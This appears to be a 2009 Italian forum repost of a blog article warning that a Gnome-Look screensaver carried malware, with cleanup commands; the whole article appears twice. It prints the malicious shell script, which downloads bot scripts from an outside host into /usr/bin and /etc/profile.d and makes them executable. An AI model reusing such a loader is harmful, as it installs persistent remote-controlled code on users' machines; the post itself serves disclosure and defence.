c.m.g
11-12-2009, 11:31
pubblicato: giovedė 10 dicembre 2009 da Lpt
http://static.blogo.it/ossblog/header1_2_1.jpg
Ieri č stato trovato del malware (http://ubuntuforums.org/showthread.php?t=1349678) all’interno di uno screensaver con una cascata caricato sul popolare sito Gnome-Look (http://gnome-look.org/).
Il codice malevolo scaricava alcuni comandi da un sito e li eseguiva per partecipare ad attacchi DDoS ed aggiornarsi. Al momento lo screensaver č stato eliminato ed il botlord ha cancellato i file che venivano scaricati dal malware.
Nel caso foste stati infettati senza rendervene conto per pulire il sistema dovete lanciare:
sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh /usr/bin/index.php /usr/bin/run.bash
sudo dpkg -r app5552
Dopo il salto trovate il codice incriminato.
#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo —————–
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo —————–
clear
exit
Nonostante i sistemi unix-like siano sistemi con un’architettura pių sicura č bene ricordare che bisogna comunque fare attenzione a quello che si installa sulla propria macchina. Nonostante questo tipo di attacchi siano piuttosto rari non č la prima volta che avvengono. Possono anche essere nascosti all’interno degli script per la compilazione e non solo dentro al programma vero e proprio.
Fonte: OssBlog (http://www.ossblog.it/post/5472/malware-dentro-ad-uno-screensaver-su-gnome-look#continua) Via | UbuntuForums (http://ubuntuforums.org/showthread.php?t=1349678)
http://static.blogo.it/ossblog/header1_2_1.jpg
Ieri č stato trovato del malware (http://ubuntuforums.org/showthread.php?t=1349678) all’interno di uno screensaver con una cascata caricato sul popolare sito Gnome-Look (http://gnome-look.org/).
Il codice malevolo scaricava alcuni comandi da un sito e li eseguiva per partecipare ad attacchi DDoS ed aggiornarsi. Al momento lo screensaver č stato eliminato ed il botlord ha cancellato i file che venivano scaricati dal malware.
Nel caso foste stati infettati senza rendervene conto per pulire il sistema dovete lanciare:
sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh /usr/bin/index.php /usr/bin/run.bash
sudo dpkg -r app5552
Dopo il salto trovate il codice incriminato.
#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo —————–
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo —————–
clear
exit
Nonostante i sistemi unix-like siano sistemi con un’architettura pių sicura č bene ricordare che bisogna comunque fare attenzione a quello che si installa sulla propria macchina. Nonostante questo tipo di attacchi siano piuttosto rari non č la prima volta che avvengono. Possono anche essere nascosti all’interno degli script per la compilazione e non solo dentro al programma vero e proprio.
Fonte: OssBlog (http://www.ossblog.it/post/5472/malware-dentro-ad-uno-screensaver-su-gnome-look#continua) Via | UbuntuForums (http://ubuntuforums.org/showthread.php?t=1349678)